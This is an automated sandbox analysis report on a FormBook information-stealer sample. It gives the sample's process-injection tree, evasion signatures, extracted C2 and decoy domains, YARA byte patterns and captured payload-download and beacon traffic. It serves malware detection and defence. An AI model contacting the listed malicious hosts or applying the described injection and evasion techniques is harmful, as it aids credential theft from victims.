Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
U8RYIwIvfK.exe

Overview

General Information

Sample Name:U8RYIwIvfK.exe
Analysis ID:736964
MD5:6f53598b9c19b30a0cf3ff0432301708
SHA1:4bd8e67e468adfbfddd9e5a1e47fdf318bf9a31b
SHA256:6d3397c687aea5017b90a5e96adc6fbfb0429d56a8b2ead1f1d4273994952379
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Writes to foreign memory regions
.NET source code references suspicious native API functions
Machine Learning detection for sample
Allocates memory in foreign processes
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to communicate with device drivers
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • U8RYIwIvfK.exe (PID: 5840 cmdline: C:\Users\user\Desktop\U8RYIwIvfK.exe MD5: 6F53598B9C19B30A0CF3FF0432301708)
    • aspnet_compiler.exe (PID: 5140 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
    • aspnet_compiler.exe (PID: 6124 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
    • aspnet_compiler.exe (PID: 6120 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 5916 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cmd.exe (PID: 4120 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.ept-egy.com/zx85/"], "decoy": ["myclassly.com", "rilcon.xyz", "miracleun.shop", "gadgetward-usa.com", "farmaacademy.com", "dreamsolutions.group", "fffood.online", "ziggnl.site", "cherpol.com", "imprescriptible-tienoscope.biz", "yztc.fun", "chicagonftweek.com", "zz0659.com", "hznaixi.com", "027-seo.net", "korlekded.com", "gelatoitaly.com", "finlitguru.com", "gupingapp.com", "manmakecoffee.com", "yuanwei.lol", "cargovoyager.com", "getjobzz.com", "dagatructiephd.com", "mynab.mobi", "masteralbert.com", "rtugwmt0cs.vip", "uscanvas.net", "nocrytech.com", "canadaroi.com", "archivegamer.com", "crossinspectionservices.com", "dxxws.com", "rufflyfedogtraining.com", "prgrn.dev", "bwdcourses.com", "criptomexico.com", "elisabethingram.online", "drationa.shop", "pulsarthermalscope.shop", "grcpp8vyuk.vip", "sh-whyyl.com", "in-cdn.xyz", "aquatabdouro.online", "handsomeshooterjewelry.com", "erug.store", "trueimpact.studio", "taskalso.com", "dzslqdz.xyz", "barbushing.com", "freightxpert.com", "777703.xyz", "bradysproducts.com", "teensforcp.site", "gpssystemecuador.com", "luxslides.com", "sony8ktv.monster", "baxiservisim.xyz", "lojascacau.com", "sfanci.com", "magdrade.com", "jobreadyfresher.com", "dori-maniacs.com", "mercydm.mobi"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x5251:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1bbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x99bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x148a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x958a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1a917:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1b91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x17839:$sqlite3step: 68 34 1C 7B E1
    • 0x1794c:$sqlite3step: 68 34 1C 7B E1
    • 0x17868:$sqlite3text: 68 38 2A 90 C5
    • 0x1798d:$sqlite3text: 68 38 2A 90 C5
    • 0x1787b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x179a3:$sqlite3blob: 68 53 D8 7F 8C
    0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 26 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.0.aspnet_compiler.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.0.aspnet_compiler.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
        • 0x1bdb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        3.0.aspnet_compiler.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.0.aspnet_compiler.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17a39:$sqlite3step: 68 34 1C 7B E1
        • 0x17b4c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a68:$sqlite3text: 68 38 2A 90 C5
        • 0x17b8d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C

        Sigma Signatures

        No Sigma rule has matched

        Snort Signatures

        Timestamp:50.115.174.192192.168.2.6443497042018856 11/03/22-12:39:59.450093
        SID:2018856
        Source Port:443
        Destination Port:49704
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.68.8.8.859575532012811 11/03/22-12:39:56.025984
        SID:2012811
        Source Port:59575
        Destination Port:53
        Protocol:UDP
        Classtype:Potentially Bad Traffic

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for submitted file
        Source: U8RYIwIvfK.exeReversingLabs: Detection: 43%
        Source: U8RYIwIvfK.exeVirustotal: Detection: 38%Perma Link
        Yara detected FormBook
        Source: Yara matchFile source: 3.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Antivirus detection for URL or domain
        Source: https://tgc8x.tk/tt/ptrr.txtAvira URL Cloud: Label: phishing
        Source: https://tgc8x.tk/tt/BLACKDEV.txtAvira URL Cloud: Label: phishing
        Multi AV Scanner detection for domain / URL
        Source: tgc8x.tkVirustotal: Detection: 5%Perma Link
        Source: https://tgc8x.tkVirustotal: Detection: 6%Perma Link
        Machine Learning detection for sample
        Source: U8RYIwIvfK.exeJoe Sandbox ML: detected
        Source: 3.0.aspnet_compiler.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.ept-egy.com/zx85/"], "decoy": ["myclassly.com", "rilcon.xyz", "miracleun.shop", "gadgetward-usa.com", "farmaacademy.com", "dreamsolutions.group", "fffood.online", "ziggnl.site", "cherpol.com", "imprescriptible-tienoscope.biz", "yztc.fun", "chicagonftweek.com", "zz0659.com", "hznaixi.com", "027-seo.net", "korlekded.com", "gelatoitaly.com", "finlitguru.com", "gupingapp.com", "manmakecoffee.com", "yuanwei.lol", "cargovoyager.com", "getjobzz.com", "dagatructiephd.com", "mynab.mobi", "masteralbert.com", "rtugwmt0cs.vip", "uscanvas.net", "nocrytech.com", "canadaroi.com", "archivegamer.com", "crossinspectionservices.com", "dxxws.com", "rufflyfedogtraining.com", "prgrn.dev", "bwdcourses.com", "criptomexico.com", "elisabethingram.online", "drationa.shop", "pulsarthermalscope.shop", "grcpp8vyuk.vip", "sh-whyyl.com", "in-cdn.xyz", "aquatabdouro.online", "handsomeshooterjewelry.com", "erug.store", "trueimpact.studio", "taskalso.com", "dzslqdz.xyz", "barbushing.com", "freightxpert.com", "777703.xyz", "bradysproducts.com", "teensforcp.site", "gpssystemecuador.com", "luxslides.com", "sony8ktv.monster", "baxiservisim.xyz", "lojascacau.com", "sfanci.com", "magdrade.com", "jobreadyfresher.com", "dori-maniacs.com", "mercydm.mobi"]}
        Source: unknownHTTPS traffic detected: 50.115.174.192:443 -> 192.168.2.6:49701 version: TLS 1.2
        Source: U8RYIwIvfK.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BLACKDEVIL.pdbBSJB source: U8RYIwIvfK.exe, 00000000.00000002.268596794.00000000027AC000.00000004.00000800.00020000.00000000.sdmp, U8RYIwIvfK.exe, 00000000.00000002.267385039.0000000002640000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000003.00000003.268178554.0000000000F19000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.369800371.0000000002A84000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.367713798.00000000028E9000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.522093440.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.523600333.0000000002D3F000.00000040.00000800.00020000.00000000.sdmp
        Source: Binary string: cmd.pdbUGP source: aspnet_compiler.exe, 00000003.00000003.366743571.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, cmd.exe, 0000000E.00000000.367246738.00000000001B0000.00000040.80000000.00040000.00000000.sdmp
        Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BLACKDEVIL.pdb source: U8RYIwIvfK.exe, 00000000.00000002.268596794.00000000027AC000.00000004.00000800.00020000.00000000.sdmp, U8RYIwIvfK.exe, 00000000.00000002.267385039.0000000002640000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000003.00000003.268178554.0000000000F19000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, cmd.exe, 0000000E.00000003.369800371.0000000002A84000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.367713798.00000000028E9000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.522093440.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.523600333.0000000002D3F000.00000040.00000800.00020000.00000000.sdmp
        Source: Binary string: aspnet_compiler.pdb source: cmd.exe, 0000000E.00000002.524907250.00000000031EF000.00000004.10000000.00040000.00000000.sdmp, cmd.exe, 0000000E.00000002.521097994.00000000027ED000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: BFXBNFDHDJNG.pdb source: U8RYIwIvfK.exe
        Source: Binary string: cmd.pdb source: aspnet_compiler.exe, 00000003.00000003.366743571.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, cmd.exe, 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, cmd.exe, 0000000E.00000000.367246738.00000000001B0000.00000040.80000000.00040000.00000000.sdmp
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001C245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001BB89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001C68BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001D31DC FindFirstFileW,FindNextFileW,FindClose,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001B85EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h

        Networking

        barindex
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\explorer.exeDomain query: www.mercydm.mobi
        Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
        Snort IDS alert for network traffic
        Source: TrafficSnort IDS: 2018856 ET TROJAN Windows executable base64 encoded 50.115.174.192:443 -> 192.168.2.6:49704
        Source: TrafficSnort IDS: 2012811 ET DNS Query to a .tk domain - Likely Hostile 192.168.2.6:59575 -> 8.8.8.8:53
        C2 URLs / IPs found in malware configuration
        Source: Malware configuration extractorURLs: www.ept-egy.com/zx85/
        Source: Joe Sandbox ViewASN Name: VIRPUS VIRPUS
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: global trafficHTTP traffic detected: GET /tt/ptrr.txt HTTP/1.1Host: tgc8x.tkConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /tt/BLACKDEV.txt HTTP/1.1Host: tgc8x.tk
        Source: global trafficHTTP traffic detected: GET /zx85/?Sl=JSAN+BGUWbFIio0Y6cR2moHwDIFZVOq3R3uV7C0AfntmXLYJvKIE34aC+rLPWCkZ7Yk0ST8b/A==&7ntH=U0D8yn_PIXqTt HTTP/1.1Host: www.mercydm.mobiConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: Joe Sandbox ViewIP Address: 50.115.174.192 50.115.174.192
        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 03 Nov 2022 11:41:36 GMTContent-Type: text/htmlContent-Length: 291ETag: "635276ab-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
        Source: U8RYIwIvfK.exe, 00000000.00000002.267402025.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: U8RYIwIvfK.exe, 00000000.00000002.267602853.0000000002677000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tgc8x.tk
        Source: explorer.exe, 00000004.00000000.295686843.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.352239311.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.315487552.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.270907548.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.341973422.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
        Source: U8RYIwIvfK.exe, 00000000.00000002.267402025.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tgc8x.tk
        Source: U8RYIwIvfK.exe, 00000000.00000002.267602853.0000000002677000.00000004.00000800.00020000.00000000.sdmp, U8RYIwIvfK.exe, 00000000.00000002.268543578.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tgc8x.tk/tt/BLACKDEV.txt
        Source: U8RYIwIvfK.exe, 00000000.00000002.268352878.00000000026F8000.00000004.00000800.00020000.00000000.sdmp, U8RYIwIvfK.exe, 00000000.00000002.267602853.0000000002677000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tgc8x.tk/tt/ptrr.txt
        Source: U8RYIwIvfK.exe, 00000000.00000002.267402025.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tgc8x.tk4
        Source: U8RYIwIvfK.exe, 00000000.00000002.268543578.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tgc8x.tkD8
        Source: unknownDNS traffic detected: queries for: tgc8x.tk
        Source: global trafficHTTP traffic detected: GET /tt/ptrr.txt HTTP/1.1Host: tgc8x.tkConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /tt/BLACKDEV.txt HTTP/1.1Host: tgc8x.tk
        Source: global trafficHTTP traffic detected: GET /zx85/?Sl=JSAN+BGUWbFIio0Y6cR2moHwDIFZVOq3R3uV7C0AfntmXLYJvKIE34aC+rLPWCkZ7Yk0ST8b/A==&7ntH=U0D8yn_PIXqTt HTTP/1.1Host: www.mercydm.mobiConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: unknownHTTPS traffic detected: 50.115.174.192:443 -> 192.168.2.6:49701 version: TLS 1.2

        E-Banking Fraud

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 3.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 3.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 3.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 3.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
